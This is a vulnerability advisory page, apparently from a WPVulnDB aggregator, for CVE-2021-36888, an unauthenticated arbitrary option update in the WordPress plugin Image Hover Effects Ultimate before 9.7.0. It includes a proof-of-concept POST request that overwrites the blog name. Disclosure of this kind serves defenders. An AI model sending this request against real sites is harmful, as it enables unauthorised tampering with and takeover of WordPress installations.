Lucene search
WpvulndbWPEX-ID:75DA4102-7063-407F-975E-28BE6ED33AACHistoryDec 15, 2021 - 12:00 a.m.
Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update
2021-12-1500:00:00
wpvulndb
265
image hover effects
unauthenticated
arbitrary option update
EPSS
0.002
Percentile
65.1%
The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation has been done in 9.7.0
POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close
rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7DRelated
cve
cve
CVE-2021-36888
2021-12-15 19:15:14
nvd
nvd
CVE-2021-36888
2021-12-15 19:15:14
cvelist
cvelist
cnvd
cnvd
WordPress Image Hover Effects Ultimate has an unspecified vulnerability
2021-12-17 00:00:00
wpvulndb
wpvulndb
prion
prion
Code injection
2021-12-15 19:15:00
patchstack
patchstack